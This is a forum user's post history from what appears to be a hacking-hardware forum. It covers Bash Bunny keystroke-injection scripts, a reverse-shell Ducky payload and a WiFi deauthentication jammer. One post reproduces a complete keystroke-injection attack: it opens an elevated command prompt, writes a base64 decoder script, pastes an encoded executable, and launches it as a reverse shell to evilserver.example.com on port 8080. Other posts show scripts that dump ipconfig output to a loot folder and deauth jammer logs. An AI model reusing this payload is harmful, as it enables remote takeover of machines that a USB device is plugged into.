Jump to content

s_o_r_c_e_r_e_r

Active Members
  • Posts

    11
  • Joined

  • Last visited

Posts posted by s_o_r_c_e_r_e_r

  1. My problem was that any "Q STRING" line ending with ".txt" will fail, that's why there is nothing showing up in the loot folder if you are trying to
    put a file with the ".txt" extension there.

    The workaround for me was:

    Q STRING file.tx
    Q STRING t
    Q ENTER

  2. Ok. I did a new test and put every line in single quotes, but the line ending with ".txt" is still not showing?

     

    LED SETUP
    ATTACKMODE HID
    DUCKY_LANG no
    Q STRING 'test.tx'
    Q ENTER
    Q STRING 'test.xt'
    Q ENTER
    Q STRING 'test.txt'
    Q ENTER
    Q STRING 'test.doc'
    Q ENTER
    LED G 1000

     

    Result:

    test.tx
    test.xt
    
    test.doc

     

  3.  

    Ok, this just make no sense at all. To me it seems like it is the ending "txt" that is the problem, because "doc" works fine, and even "tx" will work.

    I am totally lost here. Of cause I could just go with another file extension than "txt", but this is not how it should work.

     

    Here are the results of the different suggestions you made:

     

    LED SETUP
    ATTACKMODE HID
    DUCKY_LANG no
    Q STRING ipconfig all \> f:\\loot\\test.doc
    Q ENTER
    Q STRING ipconfig all \> f:\\loot\\test.txt
    Q ENTER
    LED G 1000
     
    Result:
    ipconfig all > f:\loot\test.doc

     


    LED SETUP
    ATTACKMODE HID
    DUCKY_LANG no
    Q STRING ipconfig all \> f:\\loot\\test.txt
    Q ENTER
    Q STRING ipconfig all \> f:\\loot\\test.doc
    Q ENTER
    LED G 1000

     

    Result:

    ipconfig all > f:\loot\test.doc

     


    LED SETUP
    ATTACKMODE HID
    DUCKY_LANG no
    Q STRING "ipconfig all \> f:\\loot\\test.txt"
    Q ENTER
    Q STRING "ipconfig all \> f:\\loot\\test.doc"
    Q ENTER
    LED G 1000
     
    Result:
    ipconfig all \> f:\loot\test.doc

     

     
     
     
  4. I have this strange quacking behaviour:

     

    When i output to notepad,

    This line is quacking just fine:
    Q STRING ipconfig /all \> f:\\loot\\test.doc

    This line is not quacking at all:
    Q STRING ipconfig /all \> f:\\loot\\test.txt

    Is this a bug, or am I totally overlooking something?


    This is my simple test script:

    LED SETUP
    ATTACKMODE HID
    DUCKY_LANG no
    Q STRING ipconfig all \> f:\\loot\\test.doc
    Q ENTER
    Q STRING ipconfig all \> f:\\loot\\test.txt
    Q ENTER
    LED G 100

    I am on version : 1.3_267

    Any help would be greatly appreciated.

     

     

  5. Hello.

    I am getting the following error when running the reverse shell script:

    c:\decoder.vbs(2, 179) Microsoft VBScript compilation error: Expected integer constant

    I tried it on Windows 7 and 10 with the same result.

    Here is the script I am using:

    Quote

    DELAY 1000
    ESCAPE
    CTRL ESCAPE
    DELAY 1000
    STRING cmd
    DELAY 1000
    CTRL-SHIFT ENTER
    DELAY 1000
    LEFTARROW
    ENTER
    DELAY 1000
    STRING copy con c:\decoder.vbs /Y
    ENTER
    DELAY 500
    STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
    STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS =
    STRING CreateObject("Scripting.FileSystemObject"):
    ENTER
    STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded =
    STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function
    STRING decodeBase64(base64):
    ENTER
    STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
    STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub
    STRING writeBytes(file, bytes):Dim binaryStream:
    ENTER
    STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
    STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
    ENTER
    CTRL z
    ENTER
    STRING copy con c:\reverse.txt /Y
    ENTER
    STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA
    ENTER
    STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA
    ENTER
    STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA
    ENTER
    STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    ENTER
    STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS
    ENTER
    STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA
    ENTER
    STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2
    ENTER
    STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A
    ENTER
    STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA
    ENTER
    STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA
    ENTER
    STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq
    ENTER
    STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF
    ENTER
    STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv
    ENTER
    STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp
    ENTER
    STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm
    ENTER
    STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A
    ENTER
    STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s
    ENTER
    STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9
    ENTER
    STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp
    ENTER
    STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY
    ENTER
    STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B
    ENTER
    STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk
    ENTER
    STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA
    ENTER
    STRING AAxAAADpdL7//wAAAAIAAAAMQAAA
    ENTER
    CTRL Z
    ENTER
    STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe
    ENTER
    STRING c:\reverse.exe evilserver.example.com 8080
    ENTER
    REM STRING exit
    ENTER

     

    And here is the screen output:

    Quote
    Microsoft Windows [Version 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
     
    C:\Windows\system32>copy con c:\decoder.vbs /Y
    Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments
    :inFile = arguments(0):outFile = arguments(1):Dim base64Encoded, base64Decoded,
    outByteArray:dim objFS:dim objTS:set objFS =CreateObject("Scripting.FileSystemOb
    ject"):
    set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded =objTS.ReadAll:base64Dec
    oded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private fun
    ctiondecodeBase64(base64):
    dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("
    tmp"):EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedVal
    ue:end function:private SubwriteBytes(file, bytes):Dim binaryStream:
    Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:binaryStre
    am.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
    ^Z
            1 file(s) copied.
     
    C:\Windows\system32>copy con c:\reverse.txt /Y
    TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA
    AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA
    AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS
    0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA
    AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2
    gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A
    AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA
    WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA
    MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq
    kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF
    EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv
    KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp
    AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm
    MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A
    VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s
    hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9
    gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp
    bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY
    LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B
    /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk
    SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA
    AAxAAADpdL7//wAAAAIAAAAMQAAA
    ^Z
            1 file(s) copied.
     
    C:\Windows\system32>cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe
    Microsoft (R) Windows Script Host Version 5.8
    Copyright (C) Microsoft Corporation. All rights reserved.
     
    c:\decoder.vbs(2, 179) Microsoft VBScript compilation error: Expected integer constant
     

    C:\Windows\system32>c:\reverse.exe evilserver.example.com 8080
    'c:\reverse.exe' is not recognized as an internal or external command,
    operable program or batch file.
     
    C:\Windows\system32>
    C:\Windows\system32>

     

    Any help would be much appreciated!

    Thanks in advance.

  6. We actually don't officially support the AWUS036H anymore. There have been too many issues with it. We recommend (and sell in the hakshop) the AWUS036NHA instead.

    Mine is an AWUS036NHA. I also got a D-Link DWA-140 witch also worked fine under 2.8.0, but same problem as stated above with 2.8.1 :-(

    But I do not know if it is the 2.8.1 firmware or the Wifi Jammer that is the problem?

  7. ok, this works. I know because i got disconnected from my AP the 1t time i tried it :P

    But, i can not get it to work with the right interface and having karma up at the same time.

    I am using the mark4 with firmware 2.8.1.
    tested it with alfa AWUS036H and with card that comes with the Pineapple.
    what i do is: start the mark, connect to laptop via cable to get internet, use the network manager to share the connection with karma (this is my default setup have tested and works), connect the wifi card, go to the jammer module, select wlan1 and press start, the interface comes up (i see the led flashing). From here on or i do something wrong or i dont know what is what....
    i start monitoring on wlan1{output: 'start monitor on wlan1...'} and it come up with mon0.
    While wlan1 is selected and mon0 i press start jammer. {my output is always this:

    "Starting WiFi Jammer...

    Interface : wlan0
    Monitor : mon0
    Number of deauths to send : 0
    Sleeping time in seconds : 10
    DeAuth'ing 7C:XX:A5:XX:XX:4D...
    Sleeping for 10 seconds...
    Sleeping for 10 seconds..."}
    tested with a power hub too, same output. Have not changed any of the other settings.
    I 'know' that the 'right' output should be something like:

    "Starting WiFi Jammer...

    Interface : wlan1
    Monitor : mon0
    Number of deauths to send : 0
    Sleeping time in seconds : 10
    DeAuth'ing 7C:XX:A5:XX:XX:4D...
    Sleeping for 10 seconds...
    Sleeping for 10 seconds..."
    no?
    thx in advance.

    Edit: Forgot to say that i have wightlisted the pineapples mac as the one of my legit ap.

    I've got the same problem as you bitSS.

    Before upgrading from 2.8.0 to 2.8.1 everything worked fine, so I think it has something to do with 2.8.1 and wifi jammer not working too well together?

    Would be nice to have Whistle Master's comment on this......

×
×
  • Create New...